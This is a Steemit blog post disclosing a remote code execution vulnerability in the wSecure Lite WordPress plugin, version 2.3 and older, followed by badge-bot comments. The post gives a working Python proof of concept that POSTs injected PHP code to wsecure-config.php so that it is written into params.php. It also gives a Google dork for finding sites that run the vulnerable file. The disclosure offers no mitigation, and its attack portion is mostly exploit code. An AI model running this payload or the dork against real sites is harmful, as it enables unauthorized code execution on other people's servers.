[CRITICAL] Vulnerable RCE in wSecure Lite(Wordpress)

soft (25) in vulnerable • 8 years ago (edited)

This vulnerability allows attackers to access the servers of all sites using version 2.3 of Wsecure or older with disabled "Magic Quotes" and don't require plugin be active. Plugin have more than 12000 downloads and 2000 activate installs.
Vulnerable file is wsecure-config.php. It gets your POST and allows write Executable code to params.php.

PoS on Python:
import requests
data = {'wsecure_action':'update','key':'','publish':'";\n public function __construct() { echo "Hello!"; }\n/','options':'','custom_path':'"/#"'}
site = "http://[wp-site]/wp-content/plugins/wsecure/wsecure-config.php"
res = requests.post(site, data=data)
print res.text

Version: 2.3 or older
Vendor Homepage: http://www.joomlaserviceprovider.com/
Google Dork: inurl: "/wp-content/plugins/wsecure/wsecure-config.php"

vulnerable rce wordpress security

8 years ago by soft (25)

$0.00

4 votes

Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!

Sort Order:

Trending

[-]

steemitboard (66) · 6 years ago

Congratulations @soft! You have received a personal award!

2 Years on Steemit
_{Click on the badge to view your Board of Honor.}

Do you like SteemitBoard's project? Then Vote for its witness and get one more award!

$0.00

[-]

steemitboard (66) · 5 years ago

Congratulations @soft! You received a personal award!

Happy Birthday! - You are on the Steem blockchain for 3 years!

_{You can view your badges on your Steem Board and compare to others on the Steem Ranking}

Vote for @Steemitboard as a witness to get one more award and increased upvotes!

$0.00

[-]

daysaiyan (0) · 8 years ago

$0.00

Reveal Comment